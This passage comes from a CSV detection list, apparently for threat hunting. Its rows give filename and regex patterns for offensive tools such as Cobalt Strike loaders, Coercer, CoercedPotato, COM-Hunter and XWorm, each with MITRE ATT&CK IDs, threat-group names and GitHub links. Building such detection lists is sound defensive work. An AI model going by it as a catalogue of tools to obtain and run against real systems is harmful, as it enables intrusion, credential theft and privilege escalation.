- T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","6130" "*/Cobalt-Clip/*",".{0,1000}\/Cobalt\-Clip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - 
Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","N/A","10","","N/A","","","","6131" "*/cobaltstrike*",".{0,1000}\/cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6132" "*/cobalt-strike*",".{0,1000}\/cobalt\-strike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6133" "*/cobaltstrike/c2lint*",".{0,1000}\/cobaltstrike\/c2lint.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that 
generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","#linux","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","6134" "*/CobaltStrike_OpenBeacon.git*",".{0,1000}\/CobaltStrike_OpenBeacon\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","alternative to the Cobalt Strike Beacon","T1071.001 - T1041 - T1219 - T1105","TA0011","N/A","N/A","C2","https://github.com/ElJaviLuki/CobaltStrike_OpenBeacon","1","1","N/A","N/A","10","10","225","40","2024-03-13T04:32:57Z","2023-12-27T18:37:46Z","6135" "*/cobaltstrike-nemesis-connector/*",".{0,1000}\/cobaltstrike\-nemesis\-connector\/.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","6136" "*/code_exec.ps1*",".{0,1000}\/code_exec\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","6137" "*/CodeBuildLooter.py*",".{0,1000}\/CodeBuildLooter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. 
This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","6138" "*/CoercedPotato.cpp*",".{0,1000}\/CoercedPotato\.cpp.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","6139" "*/CoercedPotato.git*",".{0,1000}\/CoercedPotato\.git.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","1","N/A","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","6140" "*/CoercedPotatoRDLL.git*",".{0,1000}\/CoercedPotatoRDLL\.git.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","6141" "*/coercer.egg-info*",".{0,1000}\/coercer\.egg\-info.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation 
tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","6142" "*/Coercer.git*",".{0,1000}\/Coercer\.git.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","6143" "*/Coercer.py*",".{0,1000}\/Coercer\.py.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","6144" "*/Coercer/*.py",".{0,1000}\/Coercer\/.{0,1000}\.py","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","6145" "*/coercer_output_*.txt*",".{0,1000}\/coercer_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6146" "*/CoffeeLdr.c*",".{0,1000}\/CoffeeLdr\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object 
File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","6147" "*/CoffeeLdr/*",".{0,1000}\/CoffeeLdr\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 
- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","6148" "*/COFFLoader*",".{0,1000}\/COFFLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","6149" "*/COFFLoader.exe*",".{0,1000}\/COFFLoader\.exe.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","1","N/A","N/A","8","8","724","92","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z","6150" 
"*/COFFLoader2/*",".{0,1000}\/COFFLoader2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","N/A","10","10","215","44","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z","6151" "*/collection/screengrab*",".{0,1000}\/collection\/screengrab.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - 
T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","N/A","10","10","1113","162","2025-04-17T17:49:44Z","2020-06-30T19:24:13Z","6152" "*/com.webtrufflehog.json*",".{0,1000}\/com\.webtrufflehog\.json.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","N/A","N/A","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","6154" "*/com/blackh4t/*",".{0,1000}\/com\/blackh4t\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Practice Go programming and implement CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - 
Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","1","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","6155" "*/combine_harvester.git*",".{0,1000}\/combine_harvester\.git.{0,1000}","offensive_tool_keyword","combine_harvester","Rust in-memory dumper","T1055 - T1055.001 - T1055.012","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/m3f157O/combine_harvester","1","1","N/A","N/A","10","2","108","17","2023-07-26T07:16:00Z","2023-07-20T07:37:51Z","6156" "*/comfoo.profile*",".{0,1000}\/comfoo\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive 
- Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","6157" "*/COMHijackToolkit.ps1*",".{0,1000}\/COMHijackToolkit\.ps1.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","6158" "*/COM-Hunter.csproj*",".{0,1000}\/COM\-Hunter\.csproj.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","6159" "*/COM-Hunter.exe*",".{0,1000}\/COM\-Hunter\.exe.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","6160" "*/COM-Hunter.git*",".{0,1000}\/COM\-Hunter\.git.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","6161" 
"*/COM-Hunter.sln*",".{0,1000}\/COM\-Hunter\.sln.{0,1000}","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","1","N/A","N/A","10","3","289","48","2025-03-11T04:49:55Z","2022-05-26T19:34:59Z","6162" "*/COMInjectTarget.dll*",".{0,1000}\/COMInjectTarget\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","1","N/A","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","6163" "*/Command Reciever.exe*",".{0,1000}\/Command\sReciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6164" "*/Command%20Reciever.exe*",".{0,1000}\/Command\%20Reciever\.exe.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","6165" 